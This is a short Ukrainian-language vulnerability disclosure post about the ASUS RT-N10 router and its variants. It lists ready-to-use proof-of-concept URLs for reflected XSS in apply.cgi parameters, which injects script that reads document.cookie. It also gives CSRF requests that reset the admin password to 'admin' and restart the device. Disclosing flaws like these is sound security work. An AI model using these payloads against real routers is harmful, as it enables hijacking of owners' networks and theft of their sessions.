XSS та CSRF уразливості в ASUS RT-N10
16:25 24.06.201727.05.2016
У листопаді, 30.11.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-N10. А також в його модифікаціях RT-N10E, RT-N10LX і RT-N10U. Це друга частина дірок в RT-N10.
Раніше я писав про уразливості ASUS RT-N10.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
24.06.2017
Cross-Site Scripting (WASC-08):
http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
http://site/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
Cross-Site Request Forgery (WASC-09):
Зміна паролю адміна:
http://site/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save
http://site/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart
Уразливі всі версії ASUS RT-N10. Перевірялося в прошивці v.1.9.2.7.